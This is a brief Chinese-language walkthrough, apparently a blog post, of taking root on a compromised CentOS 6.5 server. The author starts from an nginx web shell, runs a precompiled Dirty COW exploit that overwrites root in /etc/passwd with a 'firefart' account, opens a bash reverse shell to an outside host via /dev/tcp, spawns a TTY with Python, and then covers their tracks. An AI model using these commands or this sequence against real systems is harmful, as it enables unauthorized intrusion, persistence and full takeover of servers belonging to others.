0x00-前言：

1）当前shell权限是nginx

2）服务器有公网IP

3）Linux版本是：Centos6.5

4）内核版本为：2.6.32-431.el6.x86_64

0x02-脏牛提权大法

我们直接把编译好的脏牛提权脚本放入到目标服务器tmp目录，给执行权限，然后直接运行，后面跟的是提权之后的用户密码。

等待三四分钟，我们再开一个终端，去cat一下passwd文件，就会发现root用户已经被替换成firefart了，如图 此时说明提权已经成功。我们可以直接用ssh登录到服务器中。

可是问题往往没有那么简单，这台服务器开了防火墙并且ssh也被过滤掉了，我们没有办法直接用firefart用户登录上去。但这也并不影响我们操作，我们可以直接su到root用户上去。

但是在su的过程中呢，往往是有坑的，如图 在执行su - firefart命令后总是提示需要tty才能切换，因为没有tty就无法在shell里进行交互输入。这个坑也一直困扰了我很长时间，不过在长期的提权摸索中我总结出来一套方法。

我们先利用bash反弹一个shell到公网服务器上，我这边是在kali上挂了一个代理，直接反弹到kali上面去了，bash反弹shell语句如下：

bash -i >& /dev/tcp/X.X.X.X/8880 0>&1

反弹过来shell之后， 我们运行python的进入tty命令。

python -c 'import pty; pty.spawn("/bin/sh")'

那么这个时候再去su - firefart，就会直接让你输入密码了，我们直接输入提权时设置的密码asdf00.com，就可以成功登陆到目标服务器了。

最后打扫一下战场，溜了。。。。

0x03-总结